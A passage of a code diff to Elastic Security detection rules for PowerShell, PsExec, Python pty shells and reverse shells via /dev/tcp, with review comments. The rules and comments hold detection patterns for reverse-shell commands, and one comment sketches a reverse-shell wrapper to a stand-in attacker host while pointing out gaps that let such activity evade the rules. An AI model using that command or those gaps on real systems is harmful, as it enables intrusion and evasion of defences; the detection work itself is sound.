Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.category:process and\n powershell.file.script_block_text : (\n TVqQAAMAAAAEAAAA\n )\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "ad84d445-b1ce-4377-82d9-7c633f28bf9a", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -52,5 +65,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_posh_psreflect.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_posh_psreflect.json index 336cb17c67a96..cea7446214218 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_posh_psreflect.json 
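Review bot: The new `setup` string repeats a word in `Steps to implement the logging policy with with Advanced Audit Configuration:`; it should read `Steps to implement the logging policy with Advanced Audit Configuration:`. The same duplication is carried into the `setup` field added in the execution_posh_psreflect hunk below, so both strings should be corrected together. Moving the `## Config` section out of `note` into `setup` is otherwise a clean split. The `required_fields` entry for `powershell.file.script_block_text` with `"ecs": false` and `"type": "unknown"` is presumably what the generator emits for a non-ECS field; if the PowerShell integration's mapping for that field is known, declaring its real type would make the list more useful to consumers.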
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_posh_psreflect.json 
@@ -14,14 +14,27 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell PSReflect Script", - "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to\ncreate enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and\nmalware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through\nPowerShell, enabling defenders to discover tools being dropped in the environment.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The\nscript content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id`\nfor filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Retrieve the script and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "query": "event.category:process and \n powershell.file.script_block_text:(\n \"New-InMemoryModule\" or\n \"Add-Win32Type\" or\n psenum or\n DefineDynamicAssembly or\n DefineDynamicModule or\n \"Reflection.TypeAttributes\" or\n \"Reflection.Emit.OpCodes\" or\n \"Reflection.Emit.CustomAttributeBuilder\" or\n \"Runtime.InteropServices.DllImportAttribute\"\n )\n", + "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. 
It also helps to\ncreate enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and\nmalware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through\nPowerShell, enabling defenders to discover tools being dropped in the environment.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The\nscript content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id`\nfor filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Retrieve the script and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive 
analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.category:process and\n powershell.file.script_block_text:(\n \"New-InMemoryModule\" or\n \"Add-Win32Type\" or\n psenum or\n DefineDynamicAssembly or\n DefineDynamicModule or\n \"Reflection.TypeAttributes\" or\n \"Reflection.Emit.OpCodes\" or\n \"Reflection.Emit.CustomAttributeBuilder\" or\n \"Runtime.InteropServices.DllImportAttribute\"\n )\n", "references": [ "https://github.com/mattifestation/PSReflect/blob/master/PSReflect.psm1", "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "56f2e9b5-4803-4e44-a0a4-a52dc79d57fe", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -61,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_process_started_from_process_id_file.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_process_started_from_process_id_file.json
index bd26965a489a6..b1b58d1e8e98c 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_process_started_from_process_id_file.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_process_started_from_process_id_file.json
@@ -20,6 +20,23 @@
 "https://twitter.com/GossiTheDog/status/1522964028284411907",
 "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.executable",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "user.id",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "3688577a-d196-11ec-90b0-f661ea17fbce",
 "severity": "high",
@@ -50,5 +67,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 1
+ "version": 2
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_process_started_in_shared_memory_directory.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_process_started_in_shared_memory_directory.json
index 18931d56e6e76..297d6d33809a6 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_process_started_in_shared_memory_directory.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_process_started_in_shared_memory_directory.json
@@ -13,11 +13,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Binary Executed from Shared Memory Directory", - "query": "process where event.type == \"start\" and \n event.action == \"exec\" and user.name == \"root\" and \n process.executable : (\n \"/dev/shm/*\",\n \"/run/shm/*\",\n \"/var/run/*\",\n \"/var/lock/*\"\n )\n", + "query": "process where event.type == \"start\" and \n event.action == \"exec\" and user.name == \"root\" and \n process.executable : (\n \"/dev/shm/*\",\n \"/run/shm/*\",\n \"/var/run/*\",\n \"/var/lock/*\"\n ) and\n not process.executable : ( \"/var/run/docker/*\")\n", "references": [ "https://linuxsecurity.com/features/fileless-malware-on-linux", "https://twitter.com/GossiTheDog/status/1522964028284411907" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "3f3f9fe2-d095-11ec-95dc-f661ea17fbce", "severity": "high", @@ -48,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_psexec_lateral_movement_command.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_psexec_lateral_movement_command.json index 5f42ac26da140..45d1f19a9e3c6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_psexec_lateral_movement_command.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_psexec_lateral_movement_command.json 
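Review bot: The new `not process.executable : ( "/var/run/docker/*")` clause in the query carves an entire directory tree out of a rule that otherwise alerts on any root-executed binary under the listed tmpfs paths; since the rule only considers `user.name == "root"` and that same root actor can write under `/var/run/docker`, a payload dropped there (e.g. `/var/run/docker/payload`) is now silent where the previous version would have fired. If the false positives come from the container runtime, narrow the exclusion to the specific runtime binaries or subpaths actually observed rather than the whole directory, and name the exclusion in the rule's `note` so anyone tuning the rule knows the gap exists. The `note` field is not visible in this hunk, so it may already say so; the `required_fields` additions are fine as generated metadata.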
@@ -15,7 +15,40 @@ "language": "eql", "license": "Elastic License v2", "name": "PsExec Network Connection", - "query": "sequence by process.entity_id\n [process where process.name : \"PsExec.exe\" and event.type == \"start\"]\n [network where process.name : \"PsExec.exe\"]\n", + "note": "## Triage and analysis\n\n### Investigating PsExec Network Connection\n\nPsExec is a remote administration tool that enables the execution of commands with both regular and SYSTEM privileges\non Windows systems. Microsoft develops it as part of the Sysinternals Suite. Although commonly used by administrators,\nPsExec is frequently used by attackers to enable lateral movement and execute commands as SYSTEM to disable defenses and\nbypass security protections.\n\nThis rule identifies PsExec execution by looking for the creation of `PsExec.exe`, the default name for the\nutility, followed by a network connection done by the process.\n\n#### Possible investigation steps\n\n- Check if the usage of this tool complies with the organization's administration policy.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Identify the target computer and its role in the IT environment.\n- Investigate what commands were run, and assess whether this behavior is prevalent in the environment by looking for\nsimilar occurrences across hosts.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
As long as the analyst did not identify suspicious activity related to the\nuser or involved hosts, and the tool is allowed by the organization's policy, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - Prioritize accordingly with the role of the servers and users involved.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where process.name : \"PsExec.exe\" and event.type == \"start\" and\n\n /* This flag suppresses the display of the license dialog and may\n indicate that psexec executed for the first time in the machine */\n process.args : \"-accepteula\" and\n\n not process.executable : (\"?:\\\\ProgramData\\\\Docusnap\\\\Discovery\\\\discovery\\\\plugins\\\\17\\\\Bin\\\\psexec.exe\",\n \"?:\\\\Docusnap 11\\\\Bin\\\\psexec.exe\",\n \"?:\\\\Program Files\\\\Docusnap X\\\\Bin\\\\psexec.exe\",\n \"?:\\\\Program Files\\\\Docusnap X\\\\Tools\\\\dsDNS.exe\") and\n not process.parent.executable : \"?:\\\\Program Files (x86)\\\\Cynet\\\\Cynet Scanner\\\\CynetScanner.exe\"]\n [network where 
process.name : \"PsExec.exe\"]\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "55d551c6-333b-4665-ab7e-5d14a59715ce", "severity": "low", @@ -60,5 +93,5 @@ } ], "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_python_tty_shell.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_python_tty_shell.json index 2fb8886ffb543..6bb64d220d8f9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_python_tty_shell.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_python_tty_shell.json @@ -12,6 +12,28 @@ "license": "Elastic License v2", "name": "Interactive Terminal Spawned via Python", "query": "event.category:process and event.type:(start or process_started) and \n process.name:python* and\n process.args:(\"import pty; pty.spawn(\\\"/bin/sh\\\")\" or\n \"import pty; pty.spawn(\\\"/bin/dash\\\")\" or\n \"import pty; pty.spawn(\\\"/bin/bash\\\")\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "d76b02ef-fc95-4001-9297-01cb7412232f", "severity": "high", 
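Review bot: Gating the first sequence step on `process.args : "-accepteula"` narrows this rule to invocations that pass the flag on the command line; the query's own comment says the flag "may indicate that psexec executed for the first time in the machine", so repeat use on a host where the EULA was already accepted (commonly via the Sysinternals `EulaAccepted` registry value) and the flag is omitted no longer produces the start event at all. The new path exclusions (`?:\\Docusnap 11\\Bin\\psexec.exe` and siblings) and the `CynetScanner.exe` parent exclusion match on filename and path text only, which anyone able to create those directories can reuse to suppress the alert; if they must remain, prefer anchoring on code-signature fields where the index provides them. At minimum the added `note` should state the `-accepteula` restriction, since its sentence "This rule identifies PsExec execution by looking for the creation of `PsExec.exe` ... followed by a network connection" describes the previous, broader behaviour; something like `Only executions that pass -accepteula on the command line are considered, so repeat use after the EULA has been accepted is not covered.` would do.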
@@ -43,5 +65,5 @@ "timeline_title": "Comprehensive Process Timeline", "timestamp_override": "event.ingested", "type": "query", - "version": 9 + "version": 10 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_register_server_program_connecting_to_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_register_server_program_connecting_to_the_internet.json index 3097bad9256ad..59d609484b64f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_register_server_program_connecting_to_the_internet.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_register_server_program_connecting_to_the_internet.json @@ -19,6 +19,53 @@ "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "fb02b8d3-71ee-4af1-bacd-215d23f17efa", "severity": "low", @@ -49,7 +96,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/", "subtechnique": [ { 
@@ -63,5 +110,5 @@ } ], "type": "eql", - "version": 11 + "version": 13 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_revershell_via_shell_cmd.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_revershell_via_shell_cmd.json index 7f9805799c879..5a8be5eb012e8 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_revershell_via_shell_cmd.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_revershell_via_shell_cmd.json 
@@ -11,15 +11,53 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell Activity via Terminal", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.name in (\"sh\", \"bash\", \"zsh\", \"dash\", \"zmodload\") and\n process.args:(\"*/dev/tcp/*\", \"*/dev/udp/*\", \"zsh/net/tcp\", \"zsh/net/udp\")\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.name in (\"sh\", \"bash\", \"zsh\", \"dash\", \"zmodload\") and\n process.args : (\"*/dev/tcp/*\", \"*/dev/udp/*\", \"*zsh/net/tcp*\", \"*zsh/net/udp*\") and\n\n /* noisy FPs */\n not (process.parent.name : \"timeout\" and process.executable : \"/var/lib/docker/overlay*\") and\n not process.command_line : (\"*/dev/tcp/sirh_db/*\", \"*/dev/tcp/remoteiot.com/*\", \"*dev/tcp/elk.stag.one/*\", \"*dev/tcp/kafka/*\", \"*/dev/tcp/$0/$1*\", \"*/dev/tcp/127.*\", \"*/dev/udp/127.*\", \"*/dev/tcp/localhost/*\") and\n not process.parent.command_line : \"runc init\"\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md", "https://github.com/WangYihang/Reverse-Shell-Manager", "https://www.netsparker.com/blog/web-security/understanding-reverse-shells/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + 
"type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "a1a0375f-22c2-48c0-81a4-7c2d11cc6856", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -48,5 +86,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_scheduled_task_powershell_source.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_scheduled_task_powershell_source.json index 84fd67fa7e037..feb3c0918ff0e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_scheduled_task_powershell_source.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_scheduled_task_powershell_source.json 
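Review bot: The new `not process.command_line : (...)` tuning list contains `"*/dev/tcp/$0/$1*"`, which matches the literal, unexpanded text of a script body; a wrapper such as `bash -c 'exec 5<>/dev/tcp/$0/$1; ...' attacker-host 4444` carries exactly that text in `process.command_line`, so the exclusion meant to suppress a noisy internal script also excludes the behaviour this rule exists to catch. The host-name entries (`sirh_db`, `remoteiot.com`, `elk.stag.one`, `kafka`) are environment-specific and likewise match only on command-line text, so a connection to any host an attacker names that way is suppressed too; these belong in per-deployment rule exceptions rather than in the shipped query. The loopback entries (`*/dev/tcp/127.*`, `*/dev/udp/127.*`, `*/dev/tcp/localhost/*`), the `runc init` parent check and the `timeout`/`/var/lib/docker/overlay*` pair are generic enough to keep; I would drop `*/dev/tcp/$0/$1*` and the four host names, or at least record them in `setup`/`note` as intentional blind spots.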
@@ -15,10 +15,57 @@ "language": "eql", "license": "Elastic License v2", "name": "Outbound Scheduled Task Activity via PowerShell", - "query": "sequence by host.id, process.entity_id with maxspan = 5s\n [library where dll.name : \"taskschd.dll\" and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")]\n [network where process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and destination.port == 135 and not destination.address in (\"127.0.0.1\", \"::1\")]\n", + "query": "sequence by host.id, process.entity_id with maxspan = 5s\n [any where (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : \"taskschd.dll\" or file.name : \"taskschd.dll\") and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")]\n [network where process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and destination.port == 135 and not destination.address in (\"127.0.0.1\", \"::1\")]\n", "references": [ "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.address", + "type": "keyword" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "5cd55388-a19c-47c7-8ec4-f41656c2fded", "severity": "medium", @@ -54,5 +101,5 @@ } ], "type": "eql", - "version": 4 + "version": 6 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_script_via_automator_workflows.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_script_via_automator_workflows.json
index 62990c9a4b342..d48fed87a043b 100644
